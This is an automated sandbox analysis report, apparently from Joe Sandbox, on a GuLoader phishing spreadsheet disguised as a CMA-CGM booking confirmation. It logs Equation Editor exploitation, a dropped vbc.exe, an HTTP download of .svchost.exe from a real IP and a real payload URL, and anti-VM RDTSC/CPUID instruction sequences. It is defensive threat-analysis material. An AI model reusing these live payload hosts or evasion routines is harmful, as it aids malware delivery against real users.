Windows Analysis Report CMA-CGM BOOKING CONFIRMATION.xlsx

Overview

General Information

Sample Name: CMA-CGM BOOKING CONFIRMATION.xlsx
Analysis ID: 450863
MD5: 1a23b8c8e5fa52a917c92207a8316b55
SHA1: 7b481fe511b2132d2d2dc7cad79aa5ebda0d3388
SHA256: 9584a27702d6f6fdecc4589a5c87b529ef2c41ca556ddf9325999a4bdb58fcc3
Tags: VelvetSweatshopxlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Potentially malicious time measurement code found
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

AV Detection:

Found malware configuration
Source: 00000006.00000002.2354861374.00000000003B0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_QVwo"}
Multi AV Scanner detection for submitted file
Source: CMA-CGM BOOKING CONFIRMATION.xlsx ReversingLabs: Detection: 28%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ISOL.pdb source: .svchost[1].exe.4.dr

Software Vulnerabilities:

Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 74MB

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://kinmirai.org/wp-content/bin_QVwo
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 19 Jul 2021 17:39:29 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Mon, 19 Jul 2021 08:52:32 GMTETag: "42468-5c7760eda0fd0"Accept-Ranges: bytesContent-Length: 271464Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 180.214.239.39
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /disk/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B0A6367.emf
Source: .svchost[1].exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: 3B0A6367.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing from the yellow bar above i: I! i T Thisdocument is 3. Once you have enabled editi
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B55BB NtAllocateVirtualMemory, 6_2_003B55BB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B55F6 NtAllocateVirtualMemory, 6_2_003B55F6
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B5724 NtAllocateVirtualMemory, 6_2_003B5724
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B55BB 6_2_003B55BB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B5852 6_2_003B5852
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B1057 6_2_003B1057
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B78B2 6_2_003B78B2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B48E8 6_2_003B48E8
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B28E2 6_2_003B28E2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B8138 6_2_003B8138
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B513E 6_2_003B513E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B4128 6_2_003B4128
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B3920 6_2_003B3920
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B19CC 6_2_003B19CC
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B423F 6_2_003B423F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B4277 6_2_003B4277
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B4263 6_2_003B4263
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B8254 6_2_003B8254
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B5A46 6_2_003B5A46
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B5A84 6_2_003B5A84
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B2AFD 6_2_003B2AFD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B2AD6 6_2_003B2AD6
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B22D5 6_2_003B22D5
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B5359 6_2_003B5359
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B33A7 6_2_003B33A7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B33EC 6_2_003B33EC
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B2470 6_2_003B2470
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B045E 6_2_003B045E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B2C5C 6_2_003B2C5C
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B3C4D 6_2_003B3C4D
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B84A6 6_2_003B84A6
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B7CA5 6_2_003B7CA5
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B348A 6_2_003B348A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B7488 6_2_003B7488
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B34EA 6_2_003B34EA
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B84E9 6_2_003B84E9
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B3568 6_2_003B3568
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B35B0 6_2_003B35B0
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B8DB4 6_2_003B8DB4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B2DA0 6_2_003B2DA0
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B0584 6_2_003B0584
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B55F6 6_2_003B55F6
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B25D4 6_2_003B25D4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B2E2F 6_2_003B2E2F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B9626 6_2_003B9626
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B0618 6_2_003B0618
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B8E7C 6_2_003B8E7C
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B968F 6_2_003B968F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B7EFC 6_2_003B7EFC
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B46E4 6_2_003B46E4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B8ED8 6_2_003B8ED8
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B8F40 6_2_003B8F40
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B7FF5 6_2_003B7FF5
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B1FD9 6_2_003B1FD9
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: CMA-CGM BOOKING CONFIRMATION.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file contains strange resources
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/17@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$CMA-CGM BOOKING CONFIRMATION.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRDA95.tmp
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: CMA-CGM BOOKING CONFIRMATION.xlsx ReversingLabs: Detection: 28%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: CMA-CGM BOOKING CONFIRMATION.xlsx Static file information: File size 1215488 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ISOL.pdb source: .svchost[1].exe.4.dr
Source: CMA-CGM BOOKING CONFIRMATION.xlsx Initial sample: OLE indicators vbamacros = False
Source: CMA-CGM BOOKING CONFIRMATION.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.2354861374.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00406408 push es; ret 6_2_0040640F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405D8C push es; ret 6_2_00405D8B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00301833 push edx; ret 6_2_00301861
Source: C:\Users\Public\vbc.exe Code function: 6_2_00304833 push edx; ret 6_2_00304861
Source: C:\Users\Public\vbc.exe Code function: 6_2_00303033 push edx; ret 6_2_00303061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00306034 push edx; ret 6_2_00306061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00300038 push edx; ret 6_2_00300061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00301023 push edx; ret 6_2_00301051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00302823 push edx; ret 6_2_00302851
Source: C:\Users\Public\vbc.exe Code function: 6_2_00304023 push edx; ret 6_2_00304051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00307024 push edx; ret 6_2_00307051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00305825 push edx; ret 6_2_00305851
Source: C:\Users\Public\vbc.exe Code function: 6_2_00303813 push edx; ret 6_2_00303841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00302013 push edx; ret 6_2_00302041
Source: C:\Users\Public\vbc.exe Code function: 6_2_00305013 push edx; ret 6_2_00305041
Source: C:\Users\Public\vbc.exe Code function: 6_2_00306814 push edx; ret 6_2_00306841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00300818 push edx; ret 6_2_00300841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00304803 push edx; ret 6_2_00304831
Source: C:\Users\Public\vbc.exe Code function: 6_2_00303003 push edx; ret 6_2_00303031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00301803 push edx; ret 6_2_00301831
Source: C:\Users\Public\vbc.exe Code function: 6_2_00306004 push edx; ret 6_2_00306031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00300008 push edx; ret 6_2_00300031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00302074 push edx; ret 6_2_003020A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00303874 push edx; ret 6_2_003038A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00305074 push edx; ret 6_2_003050A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00306875 push edx; ret 6_2_003068A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00300878 push edx; ret 6_2_003008A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00303063 push edx; ret 6_2_00303091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00301863 push edx; ret 6_2_00301891
Source: C:\Users\Public\vbc.exe Code function: 6_2_00304863 push edx; ret 6_2_00304891
Source: C:\Users\Public\vbc.exe Code function: 6_2_00306065 push edx; ret 6_2_00306091

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: CMA-CGM BOOKING CONFIRMATION.xlsx Stream path 'EncryptedPackage' entropy: 7.99856683358 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B5852 6_2_003B5852
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B78B2 6_2_003B78B2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B28E2 6_2_003B28E2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B513E 6_2_003B513E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B4128 6_2_003B4128
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B3920 6_2_003B3920
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B423F 6_2_003B423F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B4277 6_2_003B4277
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B4263 6_2_003B4263
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B5A46 6_2_003B5A46
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B5A84 6_2_003B5A84
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B2AFD 6_2_003B2AFD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B2AD6 6_2_003B2AD6
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B33A7 6_2_003B33A7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B2470 6_2_003B2470
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B045E 6_2_003B045E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B3C4D 6_2_003B3C4D
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B7CA5 6_2_003B7CA5
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B7488 6_2_003B7488
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B8DB4 6_2_003B8DB4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B7EFC 6_2_003B7EFC
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B46E4 6_2_003B46E4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B1FD9 6_2_003B1FD9
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003B0182 second address: 00000000003B0182 instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003B6E61 second address: 00000000003B6E61 instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003B01B2 second address: 00000000003B01B2 instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003B78FC second address: 00000000003B790A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003B0182 second address: 00000000003B0182 instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003B6E61 second address: 00000000003B6E61 instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003B01B2 second address: 00000000003B01B2 instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003B78FC second address: 00000000003B790A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003B790A second address: 00000000003B79F6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov esi, DCAAA67Fh 0x00000010 test dl, dl 0x00000012 xor esi, F2CCAB26h 0x00000018 test edx, edx 0x0000001a sub esi, 536EBD65h 0x00000020 test bh, ch 0x00000022 xor esi, DAF7BFF4h 0x00000028 test ecx, ecx 0x0000002a test bx, cx 0x0000002d add esi, 00001000h 0x00000033 test bx, ax 0x00000036 cmp cl, dl 0x00000038 cmp bx, dx 0x0000003b mov dword ptr [ebp+000001F8h], FC14852Ch 0x00000045 test ebx, ecx 0x00000047 xor dword ptr [ebp+000001F8h], 83A94D75h 0x00000051 xor dword ptr [ebp+000001F8h], AA3F6E81h 0x0000005b cmp ah, 00000015h 0x0000005e sub dword ptr [ebp+000001F8h], D581B6D8h 0x00000068 cmp esi, dword ptr [ebp+000001F8h] 0x0000006e je 00007F2C903B46EAh 0x00000074 mov dword ptr [ebp+00000204h], 67BCF0E4h 0x0000007e xor dword ptr [ebp+00000204h], E457B680h 0x00000088 xor dword ptr [ebp+00000204h], E04C2F31h 0x00000092 xor dword ptr [ebp+00000204h], 1C589955h 0x0000009c cmp ch, dh 0x0000009e cmp esi, dword ptr [ebp+00000204h] 0x000000a4 je 00007F2C903B46B4h 0x000000aa test cl, dl 0x000000ac mov dword ptr [ebp+00000246h], eax 0x000000b2 mov eax, 03147A97h 0x000000b7 cmp ecx, ecx 0x000000b9 xor eax, 4F08C75Bh 0x000000be cmp cl, al 0x000000c0 sub eax, 1A91E3C1h 0x000000c5 sub eax, 318ADA0Bh 0x000000ca push eax 0x000000cb mov eax, dword ptr [ebp+00000246h] 0x000000d1 cmp bh, ah 0x000000d3 push 25819736h 0x000000d8 sub dword ptr [esp], 3CB652F7h 0x000000df xor dword ptr [esp], 3AF83707h 0x000000e6 pushad 0x000000e7 mov ebx, 000000DBh 0x000000ec rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B883C rdtsc 6_2_003B883C
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1664 Thread sleep time: -60000s >= -30000s

Anti Debugging:

Potentially malicious time measurement code found
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B5852 Start: 003B4BE7 End: 003B480D 6_2_003B5852
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B513E Start: 003B4BE7 End: 003B480D 6_2_003B513E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B4128 Start: 003B4BE7 End: 003B480D 6_2_003B4128
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B423F Start: 003B4BE7 End: 003B480D 6_2_003B423F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B4277 Start: 003B4BE7 End: 003B480D 6_2_003B4277
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B4263 Start: 003B4BE7 End: 003B480D 6_2_003B4263
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B5A46 Start: 003B5BED End: 003B480D 6_2_003B5A46
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B33A7 Start: 003B4BE7 End: 003B480D 6_2_003B33A7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B045E Start: 003B4BE7 End: 003B480D 6_2_003B045E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B7CA5 Start: 003B4BE7 End: 003B480D 6_2_003B7CA5
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B7488 Start: 003B4BE7 End: 003B480D 6_2_003B7488
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B8DB4 Start: 003B4BE7 End: 003B480D 6_2_003B8DB4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B46E4 Start: 003B4BE7 End: 003B480D 6_2_003B46E4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B1FD9 Start: 003B4BE7 End: 003B480D 6_2_003B1FD9
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B883C rdtsc 6_2_003B883C
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B28E2 mov eax, dword ptr fs:[00000030h] 6_2_003B28E2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B5201 mov eax, dword ptr fs:[00000030h] 6_2_003B5201
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B7365 mov eax, dword ptr fs:[00000030h] 6_2_003B7365
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B33A7 mov eax, dword ptr fs:[00000030h] 6_2_003B33A7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B33EC mov eax, dword ptr fs:[00000030h] 6_2_003B33EC
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B348A mov eax, dword ptr fs:[00000030h] 6_2_003B348A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B6D92 mov eax, dword ptr fs:[00000030h] 6_2_003B6D92
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B7EFC mov eax, dword ptr fs:[00000030h] 6_2_003B7EFC

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: vbc.exe, 00000006.00000002.2355005736.0000000000940000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2355005736.0000000000940000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2355005736.0000000000940000.00000002.00000001.sdmp Binary or memory string: !Progman
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid